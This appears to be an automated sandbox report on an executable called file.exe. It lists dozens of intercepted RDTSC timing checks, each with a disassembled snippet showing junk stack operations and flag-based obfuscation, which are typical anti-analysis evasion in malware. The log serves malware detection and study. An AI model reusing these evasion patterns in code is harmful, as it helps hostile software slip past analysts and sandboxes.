                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E442 second address: 121E44C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F6F31405BD6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E6CA second address: 121E6D4 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6F31ADDF6Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E6D4 second address: 121E6EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6F31405BDDh 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 121E6EA second address: 121E6F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31ADDF6Ah 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542001A second address: 5420069 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6F31405BE1h 0x00000008 pop ecx 0x00000009 mov esi, ebx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jmp 00007F6F31405BE8h 0x00000014 mov dword ptr [esp], ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6F31405BE7h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420069 second address: 542008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF79h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542008E second address: 5420092 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420092 second address: 5420096 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420096 second address: 542009C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400D78 second address: 5400D94 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF70h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400D94 second address: 5400DAC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400DAC second address: 5400E06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, di 0x00000006 mov bl, ABh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e call 00007F6F31ADDF72h 0x00000013 mov bl, al 0x00000015 pop edi 0x00000016 pushfd 0x00000017 jmp 00007F6F31ADDF6Ch 0x0000001c xor ax, 7E88h 0x00000021 jmp 00007F6F31ADDF6Bh 0x00000026 popfd 0x00000027 popad 0x00000028 pop ebp 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007F6F31ADDF75h 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400E06 second address: 5400E0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545019A second address: 54501A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54501A0 second address: 54501A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54501A4 second address: 54501C3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a movzx eax, bx 0x0000000d push eax 0x0000000e push edx 0x0000000f call 00007F6F31ADDF6Fh 0x00000014 pop ecx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54501C3 second address: 5450209 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6F31405BE9h 0x00000008 sub ax, AA56h 0x0000000d jmp 00007F6F31405BE1h 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6F31405BDDh 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450209 second address: 545020F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545020F second address: 5450213 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E00F3 second address: 53E0141 instructions: 0x00000000 rdtsc 0x00000002 call 00007F6F31ADDF6Fh 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushfd 0x0000000b jmp 00007F6F31ADDF79h 0x00000010 add eax, 55540A36h 0x00000016 jmp 00007F6F31ADDF71h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov ch, bh 0x00000023 popad 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0141 second address: 53E0151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31405BDCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0151 second address: 53E0155 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0155 second address: 53E016D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6F31405BDDh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E016D second address: 53E017D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6F31ADDF6Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E017D second address: 53E0181 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E0181 second address: 53E01AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 jmp 00007F6F31ADDF77h 0x0000000e mov ebp, esp 0x00000010 pushad 0x00000011 mov ax, 5BEBh 0x00000015 push eax 0x00000016 push edx 0x00000017 mov dx, cx 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E01AD second address: 53E01F1 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6F31405BDAh 0x00000008 adc ecx, 2B6D3878h 0x0000000e jmp 00007F6F31405BDBh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 push dword ptr [ebp+04h] 0x0000001a jmp 00007F6F31405BE6h 0x0000001f push dword ptr [ebp+0Ch] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E01F1 second address: 53E01F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 53E01F5 second address: 53E01FB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400A3A second address: 5400A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400A49 second address: 5400AB0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov cx, EE93h 0x0000000f mov di, cx 0x00000012 popad 0x00000013 push eax 0x00000014 jmp 00007F6F31405BE5h 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F6F31405BDEh 0x0000001f mov ebp, esp 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F6F31405BE7h 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5400578 second address: 54005F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F6F31ADDF6Ch 0x0000000a jmp 00007F6F31ADDF75h 0x0000000f popfd 0x00000010 popad 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F6F31ADDF6Eh 0x00000018 mov ebp, esp 0x0000001a pushad 0x0000001b call 00007F6F31ADDF6Eh 0x00000020 pushfd 0x00000021 jmp 00007F6F31ADDF72h 0x00000026 xor eax, 6AFCD3D8h 0x0000002c jmp 00007F6F31ADDF6Bh 0x00000031 popfd 0x00000032 pop ecx 0x00000033 movsx ebx, cx 0x00000036 popad 0x00000037 pop ebp 0x00000038 push eax 0x00000039 push edx 0x0000003a push eax 0x0000003b push edx 0x0000003c pushad 0x0000003d popad 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54005F2 second address: 540060F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540035D second address: 540038B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F6F31ADDF76h 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540038B second address: 540038F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 540038F second address: 5400395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410257 second address: 5410284 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6F31405BDDh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5410284 second address: 541028A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 541028A second address: 541028E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450077 second address: 545007B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545007B second address: 5450089 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450089 second address: 545008D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545008D second address: 54500A7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54500A7 second address: 54500AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54500AD second address: 54500B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54500B1 second address: 54500D4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6F31ADDF6Dh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54500D4 second address: 54500D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54500D9 second address: 5450129 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop esi 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c pushad 0x0000000d jmp 00007F6F31ADDF6Bh 0x00000012 jmp 00007F6F31ADDF78h 0x00000017 popad 0x00000018 popad 0x00000019 pop ebp 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F6F31ADDF79h 0x00000023 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5450129 second address: 545012D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 545012D second address: 5450133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54203DD second address: 54203E3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54203E3 second address: 54203E7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54203E7 second address: 54203EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54203EB second address: 54204BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007F6F31ADDF73h 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 movzx ecx, bx 0x00000013 pushfd 0x00000014 jmp 00007F6F31ADDF71h 0x00000019 or cx, E366h 0x0000001e jmp 00007F6F31ADDF71h 0x00000023 popfd 0x00000024 popad 0x00000025 mov ebp, esp 0x00000027 jmp 00007F6F31ADDF6Eh 0x0000002c mov eax, dword ptr [ebp+08h] 0x0000002f pushad 0x00000030 pushfd 0x00000031 jmp 00007F6F31ADDF6Eh 0x00000036 adc si, E638h 0x0000003b jmp 00007F6F31ADDF6Bh 0x00000040 popfd 0x00000041 mov bx, si 0x00000044 popad 0x00000045 and dword ptr [eax], 00000000h 0x00000048 jmp 00007F6F31ADDF72h 0x0000004d and dword ptr [eax+04h], 00000000h 0x00000051 jmp 00007F6F31ADDF70h 0x00000056 pop ebp 0x00000057 pushad 0x00000058 push eax 0x00000059 push edx 0x0000005a pushfd 0x0000005b jmp 00007F6F31ADDF6Ch 0x00000060 adc eax, 6E8B8AF8h 0x00000066 jmp 00007F6F31ADDF6Bh 0x0000006b popfd 0x0000006c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54201F6 second address: 54201FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54201FA second address: 5420239 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F6F31ADDF70h 0x00000008 sbb si, 64F8h 0x0000000d jmp 00007F6F31ADDF6Bh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 popad 0x00000016 xchg eax, ebp 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F6F31ADDF75h 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420239 second address: 542023F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542023F second address: 5420243 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420243 second address: 5420247 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420247 second address: 542025E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov edi, 65237C46h 0x00000011 mov edx, 260B16D2h 0x00000016 popad 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542025E second address: 5420264 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420264 second address: 5420268 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420268 second address: 542026C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 542026C second address: 5420284 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6F31ADDF6Dh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5420284 second address: 54202A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6F31405BE7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54202A0 second address: 54202B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6F31ADDF6Bh 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54202B6 second address: 54202C0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 415B94EAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440787 second address: 5440796 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440796 second address: 5440835 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F6F31405BDFh 0x00000008 pop eax 0x00000009 pushfd 0x0000000a jmp 00007F6F31405BE9h 0x0000000f xor si, FD06h 0x00000014 jmp 00007F6F31405BE1h 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d push eax 0x0000001e jmp 00007F6F31405BE1h 0x00000023 xchg eax, ebp 0x00000024 jmp 00007F6F31405BDEh 0x00000029 mov ebp, esp 0x0000002b pushad 0x0000002c mov bx, si 0x0000002f push eax 0x00000030 push edx 0x00000031 pushfd 0x00000032 jmp 00007F6F31405BE8h 0x00000037 jmp 00007F6F31405BE5h 0x0000003c popfd 0x0000003d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440835 second address: 5440872 instructions: 0x00000000 rdtsc 0x00000002 mov bh, al 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push esi 0x00000008 pushad 0x00000009 pushfd 0x0000000a jmp 00007F6F31ADDF76h 0x0000000f and ax, BAC8h 0x00000014 jmp 00007F6F31ADDF6Bh 0x00000019 popfd 0x0000001a mov ch, A8h 0x0000001c popad 0x0000001d mov dword ptr [esp], ecx 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440872 second address: 5440876 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440876 second address: 544087C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544087C second address: 54408CC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 0E883D28h 0x00000008 pushfd 0x00000009 jmp 00007F6F31405BE1h 0x0000000e jmp 00007F6F31405BDBh 0x00000013 popfd 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 mov eax, dword ptr [76FB65FCh] 0x0000001c jmp 00007F6F31405BE6h 0x00000021 test eax, eax 0x00000023 push eax 0x00000024 push edx 0x00000025 pushad 0x00000026 mov bx, 38D0h 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54408CC second address: 5440915 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF74h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007F6FA35D0FE8h 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F6F31ADDF6Ah 0x00000016 and esi, 78BDE448h 0x0000001c jmp 00007F6F31ADDF6Bh 0x00000021 popfd 0x00000022 popad 0x00000023 mov ecx, eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 mov al, dh 0x0000002a mov si, F853h 0x0000002e popad 0x0000002f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440915 second address: 544094D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31405BE9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c pushad 0x0000000d mov cx, dx 0x00000010 popad 0x00000011 and ecx, 1Fh 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F6F31405BDEh 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 544094D second address: 5440953 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440953 second address: 5440957 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5440957 second address: 54409C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6F31ADDF6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b ror eax, cl 0x0000000d pushad 0x0000000e pushfd 0x0000000f jmp 00007F6F31ADDF6Ch 0x00000014 sbb si, CE98h 0x00000019 jmp 00007F6F31ADDF6Bh 0x0000001e popfd 0x0000001f push eax 0x00000020 movsx ebx, cx 0x00000023 pop eax 0x00000024 popad 0x00000025 leave 0x00000026 jmp 00007F6F31ADDF77h 0x0000002b retn 0004h 0x0000002e nop 0x0000002f mov esi, eax 0x00000031 lea eax, dword ptr [ebp-08h] 0x00000034 xor esi, dword ptr [00F82014h] 0x0000003a push eax 0x0000003b push eax 0x0000003c push eax 0x0000003d lea eax, dword ptr [ebp-10h] 0x00000040 push eax 0x00000041 call 00007F6F35FDE852h 0x00000046 push FFFFFFFEh 0x00000048 push eax 0x00000049 push edx 0x0000004a jmp 00007F6F31ADDF75h 0x0000004f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54409C5 second address: 54409D9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 9522h 0x00000007 mov bx, E16Eh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54409D9 second address: 54409E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bx, cx 0x00000007 popad 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 54409E1 second address: 5440A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F6F31405BDFh 0x00000008 mov ah, 61h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d ret 0x0000000e nop 0x0000000f push eax 0x00000010 call 00007F6F35906508h 0x00000015 mov edi, edi 0x00000017 pushad 0x00000018 jmp 00007F6F31405BE1h 0x0000001d movzx eax, di 0x00000020 popad 0x00000021 push esp 0x00000022 pushad 0x00000023 mov eax, 38BAAC65h 0x00000028 mov ecx, 26AEA9E1h 0x0000002d popad 0x0000002e mov dword ptr [esp], ebp 0x00000031 pushad 0x00000032 push eax 0x00000033 push edx 0x00000034 mov bx, cx 0x00000037 rdtsc
